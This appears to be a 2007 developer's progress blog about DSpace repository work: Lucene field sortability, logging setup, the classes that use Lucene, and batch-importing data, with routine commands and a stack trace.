Report to John and Brad about dspace progress. Below is what I have the last few days with dspace.Jeff Attempt to use lucene to sort fields:1) Examined work by Rooma who attempted to solve the problem.2) She tried to use the lucene e

John & Brad,
Below is what I have the last few days with dspace.
Jeff


Attempt to use lucene to sort fields:
1) Examined work by Rooma who attempted to solve the problem.
2) She tried to use the lucene engine to sort the fields -> I tested lucence sort.
3) lucene will not sort tokenized fields.
4) Requests have been sent to lucene and dspace to create sortable tokenized fields. There seems to be some internal debate as to whether this is wise/possible.
5) Used lucuene 2.2 jar to dump all attributes of fields stored in our lucene DB (we are using the 2.0 jar which does not have this feature and I will return to the original jar).
6) The "isTokenized" attribute has the value “true? for all the fields except the field named “handle?.
7) In its current state, none of the fields of interest are sortable by lucene.

Unique problem of date field:
1) “date? field is not stored in lucence.
2) Likely generated in the jsp for the 10 records that are displayed.
3) derived from direct call to sql db?

My plans:
1) I talked to Bill and he says there is a way to index a field twice, as both tokenized and non-tokenized. I will explore this idea to make our fields sortable.
2) Brad and I have discussed the "date problem". Could go directly to sql or fix lucence.

Gains:
1) The lucuene 2.2 jar allows me to peer into the lucene DB and display all the properties of the stored fields.

Aliases for servlets

From the ./etc/dspace-web.xml file:

<servlet> <servlet-name>subject-search</servlet-name> <servlet-class>org.dspace.app.webui.servlet.ControlledVocabularySearchServlet</servlet-class> </servlet> <servlet> <servlet-name>simple-search</servlet-name> <servlet-class>org.dspace.app.webui.servlet.SimpleSearchServlet</servlet-class> </servlet>

Attributes of the fields in the Lucence database (in dspace) + sortable problem

I used the code below:

JavaCodeToDumpLuceneAttributes.html and found out that the fields in the lucene DB had the following attributes:

dspaceFields.html Fields cannot be tokenized if they are to be sortable. So none of the fields other then the handle are sortable.

October 17, 2007

Get logger running for dspace

1) stop tomcat



2) fix log level in dspace config file: dspace.cfg

config.template.log4j.properties = ${dspace.dir}/config/log4j.properties

config.template.log4j-handle-plugin.properties = ${dspace.dir}/config/log4j-handle-plugin.properties

config.template.oaicat.properties = ${dspace.dir}/config/oaicat.properties



3) run init_config ant task



4) make new war files

5) tomcat config file:

$CATALINA_HOME/conf/logging.properties contains

java.util.logging.ConsoleHandler.level = FINE

java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter

6) Start tomcat

October 15, 2007

Classes in dspace that touch LUCENE

All Classes that contain Lucene are in the
package org.dspace.search


Input:
./src/org/dspace/search/DSAnalyzer.java -> ./src/org/dspace/search/DSIndexer.java

Query
./src/org/dspace/search/DSTokenizer.java -> ./src/org/dspace/search/DSQuery.java

--------------------------------------------------------------------------------------------

DSIndexer is used by several classes
jgrep -l DSIndexer
./src/org/dspace/app/mediafilter/MediaFilterManager.java
./src/org/dspace/app/webui/servlet/admin/EditItemServlet.java
./src/org/dspace/content/Collection.java
./src/org/dspace/content/Community.java
./src/org/dspace/content/InstallItem.java
./src/org/dspace/content/Item.java
./src/org/dspace/search/DSIndexer.java
./src/org/dspace/search/DSQuery.java


DSQuery is used by several classes
jgrep -l DSQuery
./src/org/dspace/app/webui/servlet/ControlledVocabularySearchServlet.java
./src/org/dspace/app/webui/servlet/SimpleSearchServlet.java
./src/org/dspace/search/DSQuery.java


Other classed found in org.dspace.search
./src/org/dspace/search/Harvest.java
./src/org/dspace/search/HarvestedItemInfo.java
./src/org/dspace/search/QueryArgs.java
./src/org/dspace/search/QueryResults.java

October 12, 2007

Data files for dspace

Location in Odin to svn source files

Get data files from odin and loading them in the database

scp -r silvi003@odin.lib.umn.edu:/mnt/agecon_export/dc_mixed_nodata .


Loading the files used the command:
./dsrun edu.umn.dspace.administer.BatchImporter -R -a -e silvi003@umn.edu -s /Users/silvi003/dc_mixed_data/dc_mixed_nodata


I tried to change the code:

In DSIndexer class setting
wipe_existing = true;
Usually false. allowed the program to run much longer.

now it dies with:

Exception in thread "main" java.sql.SQLException: bad_dublin_core SchemaID=1, contributor author_contact
at org.dspace.content.Item.update(Item.java:1468)
at org.dspace.content.InstallItem.installItem(InstallItem.java:146)
at edu.umn.dspace.administer.BatchImporter.addItem(BatchImporter.java:670)
at edu.umn.dspace.administer.BatchImporter.addItems(BatchImporter.java:557)
at edu.umn.dspace.administer.BatchImporter.createCommunityStructure(BatchImporter.java:430)
at edu.umn.dspace.administer.BatchImporter.createCommunityStructure(BatchImporter.java:500)
at edu.umn.dspace.administer.BatchImporter.main(BatchImporter.java:267)

log:

2007-10-09 10:12:51,407 WARN org.dspace.content.Item @ silvi003@umn.edu::bad_dc:Bad DC field.
SchemaID=1, element: "contributor" qualifier: "author_contact" value: "Paterson,
Anna (anna@areu.org.af)"

Brad was able to edit the files and get some of the data to load. The word "urban" produced a useful search.

October 1, 2007

Things needed to set up dspace

- download eclipse
- eclipse svs plugin subclipse
- Tomcat
- postgress.jar
- config dspace.cfg files
- also see dspace.org

Continue reading "Things needed to set up dspace" »